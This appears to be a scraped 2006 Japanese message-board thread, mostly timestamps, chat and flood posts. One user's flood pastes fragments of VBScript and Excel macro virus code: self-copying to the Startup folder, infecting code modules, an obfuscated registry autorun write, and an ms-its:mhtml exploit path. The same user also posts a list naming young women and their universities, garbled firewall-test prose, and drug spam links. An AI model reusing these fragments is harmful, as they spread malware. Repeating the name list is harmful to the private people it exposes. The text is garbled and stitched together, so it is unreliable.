06/07/16 22:55:55 fIijnuy+
06/07/16 22:59:04 fIijnuy+
06/07/18 08:16:50 wvx6HT3H
06/07/18 21:10:10 2fB551Hf
06/07/19 08:04:51 i0xRjDMw
06/07/21 18:42:02 RIigX2+v
06/07/27 05:03:09 t4ba9ZsG
06/07/28 23:23:33 XYL3Ozpw
06/07/29 00:16:29 oSdaFUYK
06/08/06 02:56:37 /e1fVjsP
/ イ| 、ヽ
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06/08/07 03:13:04 EY/rEK7+
06/08/10 05:58:11 6iL5xox4
06/08/11 20:54:39 DSIV+ah/
06/08/12 00:51:32 GtjGsjbd
06/08/14 07:39:49 LmRQLn1I
06/08/14 08:40:58 CWioMfYc
06/08/14 18:33:59 d6pMrZcr
06/08/15 14:45:15 SoYHD8PZ
06/08/22 02:03:38 gkXfeulj
--------------- メンテナンス時間 ---------------
8月22日(火)午前2時 → 8月15日(火)午前7時
06/08/22 09:43:19 QgXodIPB
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06/08/22 09:43:50 QgXodIPB
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06/08/22 09:44:35 QgXodIPB
s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
<object data="ms-its:mhtml:file://C:\\MAIN.MHT! type="text/
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
06/08/22 09:45:24 QgXodIPB
{●・・スーフリキャンペーンガール ○・・・幹部スタッフ ▲・・・ミスキャンパスパークに掲載}
●塚 原 綾 香(学習院大学法学部三年) ▲
●小 湟 祐 子(学習院大学法学部三年)芸名吉 岡 ゆ う こ デジドルネットに登録グラビア女。URLリンク(www1.digidol.net)
●今 村 貴 絵(慶応義塾大学理工学部四年)
●東 紗 千 子(慶応義塾大学四年)・・・SFC(湘南藤沢)総合政策?環境情報?(Cancam読者モデル) 本来なら今春卒業済のはず
●藤 村 伊 勢(慶應義塾大学四年)・・・文学部、TBS系列放送局女子アナ内定(05年にブラウン管登場)
●亀 井 京 子(聖心女子大学四年)・・・文学部、TV東京女子アナ内定(05年にブラウン管登場) ▲
●浅 見 理 沙(フェリス女学院大学)・・・音楽部(千葉テレビに出演。タレントしてる模様) 元千葉テレビなりギャル
●蜂 矢 真 代(恵泉女子大学三年)・・・学部どこ?(芸名はちや真代 スパイス所属。湘南ミルキーズ一員。タレントしてる模様)
●長 谷 部 茜(青山学院大学三年)・・・学部どこ?
●妹 尾 愛 美(神戸女学院文学部三年)
●野 々 村 あ すみ(愛知学院大学三年)
●光 成 遥 香(成蹊大学三年)・・・学部どこ?
●稲 井 志保美(青山学院女子短期大学家政科)今春卒業 CanCam読者モデル ▲
●竹 村 優 香(立教大学文学部三年)・・・アナウンサー志望
○谷 浦 ありさ(通称ariringo、神戸女学院大学四年?)・・・女性スタッフ 文学部?名前は漢字表記かも。
○山 田 由 佳(椙山女学園大学)…女性スタッフ
△荒 舘 順 子(東京女子大学 現代文化?)…03年3/18卒業 公判で実名が挙がった唯一の女性スタッフ なくとも4年間ギャルズ
06/08/22 09:45:59 QgXodIPB
A recent BlackICE purchaser wrote to us:
"As someone who has recently purchased blackice defender, I was understandably worried by Steve's derogatory remarks
about the program and it's functioning. So I mailed them [ISS/NetworkICE] and asked for comment. I paste it here un-altered, f
or whoever may wish to read it."
For those who are interested, here is the reply this BID user reportedly received from the
anonymous "Trish M." at BlackICE Technical Support in reply to his concerns, followed by
the reply I sent back to him (non-anonymously):
BID's Official Response & My Reply
October 25, 2001
LeakTest and the Windows XP Built-In Firewall
The Windows XP built-in firewall:
The rate of LeakTest downloads jumped significantly on October 25th, 2001, presumably due to the release of Windows XP on
that date.
It is understandable that new Internet savvy users of Windows XP, who are aware of our work here at grc.com, would be curious to learn about their new system and its Internet defenses.
Just so you know, WinXP's built-in firewall does not attempt to manage or restrict outbound
connections at all. It appears to be a useful firewall for hiding the machine from the
Internet (it has "stealth mode" unsolicited packet handling), but you will still need to
use a good third-party personal firewall if you wish to manage and control outbound
connections from your system.
Introducing LeakTest
his site has been most well-known for its FREE ShieldsUP! Internet security test. Crucial
as it is to protect yourself from malicious hackers outside, those bad guys represent only
half of the threat. The Internet has proven to be an extremely fertile transportation
medium for all manner of nasty Trojan horse programs, rapidly proliferating viruses, and
privacy invading commercial spyware. As a result, it is no longer true that all of the
potential problems reside outside the computer.hfully test for LeakTest's outbound communications. As far as we know, BID
has no such
cpability. So it appears to have been designed merely to mislead and hide that truth from
ts usrs.
his IP address-specific blocking could have falsely lead BID's users into believing that
their updated BID firewall was now providing the sort of outbound blocking, protection, an
d awareness that LeakTest was designed to detect, test, and report. (And which all effective personal firewalls provide.)
lthough we would celebrate the addition of true outbound application-aware control and
blocking to BID, achieving that sort of protection is significantly more difficult ? and
certainly far more valuable to its users ? than blocking a single IP address at Gibson
Research Corp. in order to falsely appear to be doing more than they are.
eakTest Version 1.1:
Shortly after we learned of and confirmed this unfortunate decision on the part of
NetworkICE's developers, we updated the original LeakTest v1.0 to version 1.1 by simply presumably also could.
It is understandable that new Internet savvy users of Windows XP, who are aware of our work here at grc.com, would be curio
us to learn about their new system and its Internet defenses.
Just so you know, WnXP's built-in firewall does not attempt to manage or restrict outbound
connections at all. It appears to be a useful firewall for hiding the machine from the
as it is to protect yourself from malicious hackers outside, those bad guys represent only
half of the threat. The Internet has proven to be an extremely fertile transportation
medium for all manner of nasty Trojan horse programs, rapidly proliferating viruses, and
rivacy invading commercial spyware. As a result, it is no longer true that all of the
06/08/22 09:46:54 QgXodIPB
A recent BlackICE purchaser wrote to us:
"As someone who has recently purchased blackice defender, I was understandably worried by Steve's derogatory remarks
about the program and it's functioning. So I mailed them [ISS/NetworkICE] and asked for comment. I paste it here un-altered, f
or whoever may wish to read it."
For those who are interested, here is the reply this BID user reportedly received from the
anonymous "Trish M." at BlackICE Technical Support in reply to his concerns, followed by
the reply I sent back to him (non-anonymously):
BID's Official Response & My Reply
October 25, 2001
LeakTest and the Windows XP Built-In Firewall
The Windows XP built-in firewall:
The rate of LeakTest downloads jumped significantly on October 25th, 2001, presumably due to the release of Windows XP on
that date.
It is understandable that new Internet savvy users of Windows XP, who are aware of our work here at grc.com, would be curious to learn about their new system and its Internet defenses.
Just so you know, WinXP's built-in firewall does not attempt to manage or restrict outbound
connections at all. It appears to be a useful firewall for hiding the machine from the
Internet (it has "stealth mode" unsolicited packet handling), but you will still need to
use a good third-party personal firewall if you wish to manage and control outbound
connections from your system.
Introducing LeakTest
his site has been most well-known for its FREE ShieldsUP! Internet security test. Crucial
as it is to protect yourself from malicious hackers outside, those bad guys represent only
half of the threat. The Internet has proven to be an extremely fertile transportation
medium for all manner of nasty Trojan horse programs, rapidly proliferating viruses, and
privacy invading commercial spyware. As a result, it is no longer true that all of the
potential problems reside outside the computer.hfully test for LeakTest's outbound communications. As far as we know, BID
has no such
cpability. So it appears to have been designed merely to mislead and hide that truth from
ts usrs.
his IP address-specific blocking could have falsely lead BID's users into believing that
their updated BID firewall was now providing the sort of outbound blocking, protection, an
d awareness that LeakTest was designed to detect, test, and report. (And which all effective personal firewalls provide.)
lthough we would celebrate the addition of true outbound application-aware control and
blocking to BID, achieving that sort of protection is significantly more difficult ? and
certainly far more valuable to its users ? than blocking a single IP address at Gibson
Research Corp. in order to falsely appear to be doing more than they are.
eakTest Version 1.1:
Shortly after we learned of and confirmed this unfortunate decision on the part of
NetworkICE's developers, we updated the original LeakTest v1.0 to version 1.1 by simply presumably also could.
It is understandable that new Internet savvy users of Windows XP, who are aware of our work here at grc.com, would be curio
us to learn about their new system and its Internet defenses.
Just so you know, WnXP's built-in firewall does not attempt to manage or restrict outbound
connections at all. It appears to be a useful firewall for hiding the machine from the
as it is to protect yourself from malicious hackers outside, those bad guys represent only
half of the threat. The Internet has proven to be an extremely fertile transportation
medium for all manner of nasty Trojan horse programs, rapidly proliferating viruses, and
rivacy invading commercial spyware. As a result, it is no longer true that all of the
06/08/22 09:47:42 QgXodIPB
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a href="URLリンク(blog67.fc2.com) ">Verizon ringtones</a> <a href="URLリンク(buyp)<) ">Buy
Phentermine</a> <a href="URLリンク(blog67.fc2.com)
Viagra.hml ">Buy Viagra</a> <a href="h tt p ://hostedboard.com/phpbb/?mforum
=52buyphentermin ">Buy Phentermine</a> <a href="h tt p://search-meds.com/ ">Buy Phentermine</a> <a href="URLリンク(xanax.free-fo)<)
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com/r/ringt ones/file/verizon-ringtones.html]Verizon ringtones[/URL] [URL=URLリンク(bu)<)
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com/r/ringtones/file/Buy-Phentermine.html]Buy Phentermine[/URL]
06/08/22 09:53:03 QgXodIPB
http ://tv6.2ch.net/test/read.cgi/geino/1083590306/
h スレリンク(geino板)
h t スレリンク(geino板)
htt p://tv7.2ch.net/test/read.cgi/geinoj/1110600395/
ht tp: //tv7.2ch.net/test/read.cgi/geinoj/1116995138/
ht スレリンク(geino板)
htt スレリンク(geino板)
htt p://tv7.2ch.net/test/read.cgi/actr ess/1115910836/
h ttp ://tv6.2ch.net/test/read.cgi/geino/1083590306/
ht URLリンク(music4.)<)
h URLリンク(music4.2ch.n)<)
ht tp: //tv7.2ch.net/test/read.cgi/geino/1104216545/
h tt p://tv7.2ch.net/test/read.cgi/geinoj/1110600395/
p //tv7.2ch.net/test/read.cgi/geinoj/1116995138/
h ttp: //tv7.2ch.net/test/read.cgi/geino/1121275320/
h スレリンク(geino板)
h スレリンク(actress板) スレリンク(geino板)
htt p://music4.2ch.net/test/read.cgi/geino/1091448875/
h URLリンク(tv7)<)
h スレリンク(geinoj板)
h スレリンク(geino板)
htt ://tv7.2ch.ne t/test/read.cgi/geino/1121275320/
http:// 7.2ch.net/test/read.cgi/actress/1115910836/
06/08/22 09:54:08 QgXodIPB
http ://tv6.2ch.net/test/read.cgi/geino/1083590306/
h スレリンク(geino板)
h t スレリンク(geino板)
htt p://tv7.2ch.net/test/read.cgi/geinoj/1110600395/
ht tp: //tv7.2ch.net/test/read.cgi/geinoj/1116995138/
ht スレリンク(geino板)
htt スレリンク(geino板)
htt p://tv7.2ch.net/test/read.cgi/actr ess/1115910836/
h ttp ://tv6.2ch.net/test/read.cgi/geino/1083590306/
ht URLリンク(music4.)<)
h URLリンク(music4.2ch.n)<)
ht tp: //tv7.2ch.net/test/read.cgi/geino/1104216545/
h tt p://tv7.2ch.net/test/read.cgi/geinoj/1110600395/
p //tv7.2ch.net/test/read.cgi/geinoj/1116995138/
h ttp: //tv7.2ch.net/test/read.cgi/geino/1121275320/
h スレリンク(geino板)
h スレリンク(actress板) スレリンク(geino板)
htt p://music4.2ch.net/test/read.cgi/geino/1091448875/
h URLリンク(tv7)<)
h スレリンク(geinoj板)
h スレリンク(geino板)
htt ://tv7.2ch.ne t/test/read.cgi/geino/1121275320/
http:// 7.2ch.net/test/read.cgi/actress/1115910836/
06/08/22 15:39:06 UUUptkUL
守護騎士団 7をスレ建てしてみろ・・・
06/08/22 18:26:43 xrDGNlOS
119: ◆LggC7XO7QQ
06/08/22 21:35:04 BlNvt8Pq
120: ◆fuFwHPwwg6
06/08/22 21:41:31 7TB2BItP
ちょっと移動に時間がかかった。(^ ^;ノ
121: ◆fuFwHPwwg6
06/08/22 21:42:05 7TB2BItP
謎のPさんは、行方不明か?(^ ^;ノ
122: ◆LggC7XO7QQ
06/08/22 21:49:06 BlNvt8Pq
123: ◆fuFwHPwwg6
06/08/22 21:58:16 7TB2BItP
ココは静かだな。埋め立ては停止中か?(^ ^;
06/08/22 22:04:22 SwHkP6m2
125: ◆fuFwHPwwg6
06/08/22 22:04:55 7TB2BItP
hPMqYcFuさん も脱落したみたい・・・(^ ^;
126: ◆fuFwHPwwg6
06/08/22 22:10:42 7TB2BItP
magic tv 起動テスト!(^ ^ノ
06/08/22 22:15:30 hPMqYcFu
128: ◆LggC7XO7QQ
06/08/22 22:18:24 BlNvt8Pq
129: ◆fuFwHPwwg6
06/08/22 22:21:03 7TB2BItP
しかし、実況でもPさんは、有名なのか!?(^ ^;
130: ◆fuFwHPwwg6
06/08/22 22:21:50 7TB2BItP
06/08/22 22:29:04 hPMqYcFu
132: ◆LggC7XO7QQ
06/08/22 22:30:30 BlNvt8Pq
06/08/22 22:33:57 SwHkP6m2
134: ◆LggC7XO7QQ
06/08/22 22:34:13 BlNvt8Pq
国分様、美しすぎますぅ。。。(><;)ノ ←もらいました。
06/08/22 22:35:16 SwHkP6m2
06/08/22 22:36:45 SwHkP6m2
137: ◆LggC7XO7QQ
06/08/22 22:37:22 BlNvt8Pq
ねだられる前提が想定できません!!(><;)ノ_| ̄|○←借ります
138: ◆LggC7XO7QQ
06/08/22 22:39:17 BlNvt8Pq
06/08/22 22:39:19 hPMqYcFu
140: ◆LggC7XO7QQ
06/08/22 22:40:47 BlNvt8Pq
06/08/22 22:42:35 hPMqYcFu
06/08/22 22:44:55 hPMqYcFu
143: ◆LggC7XO7QQ
06/08/22 22:45:06 BlNvt8Pq
144: ◆LggC7XO7QQ
06/08/22 22:46:07 BlNvt8Pq
145: ◆LggC7XO7QQ
06/08/22 22:47:57 BlNvt8Pq
06/08/22 22:50:07 hPMqYcFu
147: ◆LggC7XO7QQ
06/08/22 22:54:12 BlNvt8Pq
06/08/22 22:54:36 hPMqYcFu
06/08/22 22:58:04 8TY2Dt6A
77 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 22:56:05 ID:8TY2Dt6A
78 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 22:57:05 ID:8TY2Dt6A
06/08/22 22:58:52 hPMqYcFu
151: ◆LggC7XO7QQ
06/08/22 22:59:14 BlNvt8Pq
あ・・・終わってしまいました・・・_| ̄|○
06/08/22 22:59:20 8TY2Dt6A
77 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 22:56:05 ID:8TY2Dt6A
78 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 22:57:05 ID:8TY2Dt6A
153: ◆fuFwHPwwg6
06/08/22 23:01:32 7TB2BItP
ただいま!(^ ^;ノ
magic tvが起動しているときに、他のプログラム立ち上げると録画が失敗するんで書けなかった。(^ ^;
06/08/22 23:01:56 8TY2Dt6A
76 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 22:29:30 ID:UUUptkUL
77 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 22:56:05 ID:8TY2Dt6A
78 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 22:57:05 ID:8TY2Dt6A
155: ◆LggC7XO7QQ
06/08/22 23:05:32 BlNvt8Pq
156: ◆fuFwHPwwg6
06/08/22 23:05:51 7TB2BItP
157: ◆fuFwHPwwg6
06/08/22 23:07:08 7TB2BItP
158: ◆LggC7XO7QQ
06/08/22 23:07:26 BlNvt8Pq
159: ◆fuFwHPwwg6
06/08/22 23:08:26 7TB2BItP
160: ◆fuFwHPwwg6
06/08/22 23:10:47 7TB2BItP
やっぱりテレビ出演の日は意識しているのかな?(^ ^;
161: ◆fuFwHPwwg6
06/08/22 23:17:30 7TB2BItP
ファンに足場を残して・・・さいならですか?(^ ^;ノ
06/08/22 23:18:32 hPMqYcFu
163: ◆fuFwHPwwg6
06/08/22 23:20:19 7TB2BItP
164: ◆fuFwHPwwg6
06/08/22 23:20:58 7TB2BItP
しらんかった・・・_| ̄|○ さんくす
165: ◆fuFwHPwwg6
06/08/22 23:24:05 7TB2BItP
166: ◆fuFwHPwwg6
06/08/22 23:24:52 7TB2BItP
オレの連投になってる・・・_| ̄|○
06/08/22 23:32:04 hPMqYcFu
168: ◆LggC7XO7QQ
06/08/22 23:36:28 BlNvt8Pq
169: ◆fuFwHPwwg6
06/08/22 23:44:52 7TB2BItP
逆に書けなくなったじゃん・・・_| ̄|○
「国分さん」が興奮すると「国分様」になるって・・・なんだか面白い(^ ^;
オレは小悪魔であって欲しいねえ・・・(^ ^;ノ
170: ◆fuFwHPwwg6
06/08/22 23:47:05 7TB2BItP
06/08/22 23:47:36 hewtpJtF
06/08/23 04:02:02 jo3nZXiW
06/08/23 08:32:31 Wy2TA+nN
72 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 21:43:26 ID:8TY2Dt6A
130 名前:DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml[] 投稿日:2006/08/22(火) 14:25:32 ID:9eaKdgnF
33 名前: [] 投稿日:2006/08/22(火) 11:35:06 ID:SxlHVTLA
32 名前: [] 投稿日:2006/08/22(火) 11:34:30 ID:SxlHVTLA
31 名前:名無しさん@お腹いっぱい。[] 投稿日:2006/08/22(火) 11:33:59 ID:SxlHVTLA
30 名前:名無しさん@お腹いっぱい。[] 投稿日:2006/08/22(火) 11:33:04 ID:SxlHVTLA
29 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:32:24 ID:SxlHVTLA
28 名前: [] 投稿日:2006/08/22(火) 11:31:53 ID:SxlHVTLA
27 名前: [sage] 投稿日:2006/08/22(火) 11:31:22 ID:SxlHVTLA
26 名前: [] 投稿日:2006/08/22(火) 11:30:36 ID:SxlHVTLA
25 名前:名無しさん@お腹いっぱい。[] 投稿日:2006/08/22(火) 11:30:06 ID:SxlHVTLA
24 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:29:31 ID:SxlHVTLA
23 名前: 。[sage] 投稿日:2006/08/22(火) 11:28:54 ID:SxlHVTLA
22 名前: [] 投稿日:2006/08/22(火) 11:28:06 ID:SxlHVTLA
21 名前: 。[sage] 投稿日:2006/08/22(火) 11:27:33 ID:SxlHVTLA
20 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:27:02 ID:SxlHVTLA
19 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:25:16 ID:SxlHVTLA
3 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:45:54 ID:QgXodIPB
862 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:44:06 ID:QgXodIPB
861 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:43:34 ID:QgXodIPB
860 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:43:01 ID:QgXodIPB
859 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:42:00 ID:QgXodIPB
858 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:41:15 ID:QgXodIPB
857 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:40:40 ID:QgXodIPB
巛王 \"ヽ-;:,,,,,,ノ
__(●)(●)((●)((●))(●)(●)(●)ii● l(●)(●)(●)__
/ (●)(●)(●)(●)(●))(●)(●)(●゙'‐='"(●)(●)(●) \
_ (●)(●)(●)(●)(●)(●)(●)(●)))(●)(●)(●)(●)_
/ (●)(●)(●)(●)(●))(●)(◎)(●))(●)(●)(●)(●) \
(●)((ii ,●l)(●))(●)(●)(●)(●)(●)(●)(●)
/ (●)(●)(●)(●)(●))(●)(●,,r==、(●)(●)(●)(●) \
_ (●)(●)(●)(●)(●)(●)(●)ii ● ))(●)(●)(●)(●)_
/ (●)(●)(丿"~"i i(●)(●)(●)゙'‐='"(●)(●)(●)(●) \
_(●)(●)(",, )(X)ヽヽ(●))(●)(●))(●)(●)(●)(●)_
(●)(●)\ ヽXヽヽ(●))(●)(●)(≡)(≡)(●)(●)
__(●)(●)((●\ヽ Xヽヽ(●)((●))(●)(●)(ミ)(●)__
/ (●)(●),,r==、)( \,",",ソ●(●))(●),,r==、●)(●) \
_ (●)(●)ii ,●l)(●)(●)(●)(●)))(●ii● ;)(●)(●)_
/ (●)(●)゙'‐='"(●)(●))(●)(●)(●))((゙'‐='"(●)(●) \
/ (l●)(●)(●),,r==、)(●)(●)(●)(,,r==、)(●)(●l;) \
| . (l;●)(●)(● ,● ))(●))(●)(●)ii ● l)(●)(●) |
06/08/23 08:33:02 Wy2TA+nN
173 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/23(水) 08:32:31 ID:Wy2TA+nN
72 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 21:43:26 ID:8TY2Dt6A
33 名前: [] 投稿日:2006/08/22(火) 11:35:06 ID:SxlHVTLA
32 名前: [] 投稿日:2006/08/22(火) 11:34:30 ID:SxlHVTLA
31 名前:名無しさん@お腹いっぱい。[] 投稿日:2006/08/22(火) 11:33:59 ID:SxlHVTLA
30 名前:名無しさん@お腹いっぱい。[] 投稿日:2006/08/22(火) 11:33:04 ID:SxlHVTLA
29 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:32:24 ID:SxlHVTLA
28 名前: [] 投稿日:2006/08/22(火) 11:31:53 ID:SxlHVTLA
27 名前: [sage] 投稿日:2006/08/22(火) 11:31:22 ID:SxlHVTLA
26 名前: [] 投稿日:2006/08/22(火) 11:30:36 ID:SxlHVTLA
25 名前:名無しさん@お腹いっぱい。[] 投稿日:2006/08/22(火) 11:30:06 ID:SxlHVTLA
24 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:29:31 ID:SxlHVTLA
23 名前: 。[sage] 投稿日:2006/08/22(火) 11:28:54 ID:SxlHVTLA
22 名前: [] 投稿日:2006/08/22(火) 11:28:06 ID:SxlHVTLA
21 名前: 。[sage] 投稿日:2006/08/22(火) 11:27:33 ID:SxlHVTLA
20 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:27:02 ID:SxlHVTLA
19 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:25:16 ID:SxlHVTLA
3 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:45:54 ID:QgXodIPB
862 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:44:06 ID:QgXodIPB
861 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:43:34 ID:QgXodIPB
860 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:43:01 ID:QgXodIPB
859 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:42:00 ID:QgXodIPB
858 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:41:15 ID:QgXodIPB
857 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:40:40 ID:QgXodIPB
巛王 \"ヽ-;:,,,,,,ノ
__(●)(●)((●)((●))(●)(●)(●)ii● l(●)(●)(●)__
/ (●)(●)(●)(●)(●))(●)(●)(●゙'‐='"(●)(●)(●) \
_ (●)(●)(●)(●)(●)(●)(●)(●)))(●)(●)(●)(●)_
/ (●)(●)(●)(●)(●))(●)(◎)(●))(●)(●)(●)(●) \
(●)((ii ,●l)(●))(●)(●)(●)(●)(●)(●)(●)
/ (●)(●)(●)(●)(●))(●)(●,,r==、(●)(●)(●)(●) \
_ (●)(●)(●)(●)(●)(●)(●)ii ● ))(●)(●)(●)(●)_
/ (●)(●)(丿"~"i i(●)(●)(●)゙'‐='"(●)(●)(●)(●) \
_(●)(●)(",, )(X)ヽヽ(●))(●)(●))(●)(●)(●)(●)_
(●)(●)\ ヽXヽヽ(●))(●)(●)(≡)(≡)(●)(●)
__(●)(●)((●\ヽ Xヽヽ(●)((●))(●)(●)(ミ)(●)__
/ (●)(●),,r==、)( \,",",ソ●(●))(●),,r==、●)(●) \
_ (●)(●)ii ,●l)(●)(●)(●)(●)))(●ii● ;)(●)(●)_
/ (●)(●)゙'‐='"(●)(●))(●)(●)(●))((゙'‐='"(●)(●) \
/ (l●)(●)(●),,r==、)(●)(●)(●)(,,r==、)(●)(●l;) \
| . (l;●)(●)(● ,● ))(●))(●)(●)ii ● l)(●)(●) |
06/08/23 08:33:43 Wy2TA+nN
173 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/23(水) 08:32:31 ID:Wy2TA+nN
72 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 21:43:26 ID:8TY2Dt6A
130 名前:DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml[] 投稿日:2006/08/22(火) 14:25:32 ID:9eaKdgnF
33 名前: [] 投稿日:2006/08/22(火) 11:35:06 ID:SxlHVTLA
32 名前: [] 投稿日:2006/08/22(火) 11:34:30 ID:SxlHVTLA
31 名前:名無しさん@お腹いっぱい。[] 投稿日:2006/08/22(火) 11:33:59 ID:SxlHVTLA
30 名前:名無しさん@お腹いっぱい。[] 投稿日:2006/08/22(火) 11:33:04 ID:SxlHVTLA
29 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:32:24 ID:SxlHVTLA
28 名前: [] 投稿日:2006/08/22(火) 11:31:53 ID:SxlHVTLA
27 名前: [sage] 投稿日:2006/08/22(火) 11:31:22 ID:SxlHVTLA
26 名前: [] 投稿日:2006/08/22(火) 11:30:36 ID:SxlHVTLA
25 名前:名無しさん@お腹いっぱい。[] 投稿日:2006/08/22(火) 11:30:06 ID:SxlHVTLA
24 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:29:31 ID:SxlHVTLA
23 名前: 。[sage] 投稿日:2006/08/22(火) 11:28:54 ID:SxlHVTLA
22 名前: [] 投稿日:2006/08/22(火) 11:28:06 ID:SxlHVTLA
21 名前: 。[sage] 投稿日:2006/08/22(火) 11:27:33 ID:SxlHVTLA
20 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:27:02 ID:SxlHVTLA
19 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:25:16 ID:SxlHVTLA
3 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:45:54 ID:QgXodIPB
862 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:44:06 ID:QgXodIPB
861 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:43:34 ID:QgXodIPB
860 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:43:01 ID:QgXodIPB
859 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:42:00 ID:QgXodIPB
858 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:41:15 ID:QgXodIPB
857 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:40:40 ID:QgXodIPB
巛王 \"ヽ-;:,,,,,,ノ
__(●)(●)((●)((●))(●)(●)(●)ii● l(●)(●)(●)__
/ (●)(●)(●)(●)(●))(●)(●)(●゙'‐='"(●)(●)(●) \
_ (●)(●)(●)(●)(●)(●)(●)(●)))(●)(●)(●)(●)_
/ (●)(●)(●)(●)(●))(●)(◎)(●))(●)(●)(●)(●) \
(●)((ii ,●l)(●))(●)(●)(●)(●)(●)(●)(●)
/ (●)(●)(●)(●)(●))(●)(●,,r==、(●)(●)(●)(●) \
_ (●)(●)(●)(●)(●)(●)(●)ii ● ))(●)(●)(●)(●)_
/ (●)(●)(丿"~"i i(●)(●)(●)゙'‐='"(●)(●)(●)(●) \
_(●)(●)(",, )(X)ヽヽ(●))(●)(●))(●)(●)(●)(●)_
(●)(●)\ ヽXヽヽ(●))(●)(●)(≡)(≡)(●)(●)
__(●)(●)((●\ヽ Xヽヽ(●)((●))(●)(●)(ミ)(●)__
/ (●)(●),,r==、)( \,",",ソ●(●))(●),,r==、●)(●) \
_ (●)(●)ii ,●l)(●)(●)(●)(●)))(●ii● ;)(●)(●)_
/ (●)(●)゙'‐='"(●)(●))(●)(●)(●))((゙'‐='"(●)(●) \
/ (l●)(●)(●),,r==、)(●)(●)(●)(,,r==、)(●)(●l;) \
| . (l;●)(●)(● ,● ))(●))(●)(●)ii ● l)(●)(●) |
06/08/23 08:34:14 Wy2TA+nN
173 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/23(水) 08:32:31 ID:Wy2TA+nN
72 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 21:43:26 ID:8TY2Dt6A
130 名前:DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml[] 投稿日:2006/08/22(火) 14:25:32 ID:9eaKdgnF
33 名前: [] 投稿日:2006/08/22(火) 11:35:06 ID:SxlHVTLA
32 名前: [] 投稿日:2006/08/22(火) 11:34:30 ID:SxlHVTLA
31 名前:名無しさん@お腹いっぱい。[] 投稿日:2006/08/22(火) 11:33:59 ID:SxlHVTLA
30 名前:名無しさん@お腹いっぱい。[] 投稿日:2006/08/22(火) 11:33:04 ID:SxlHVTLA
29 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:32:24 ID:SxlHVTLA
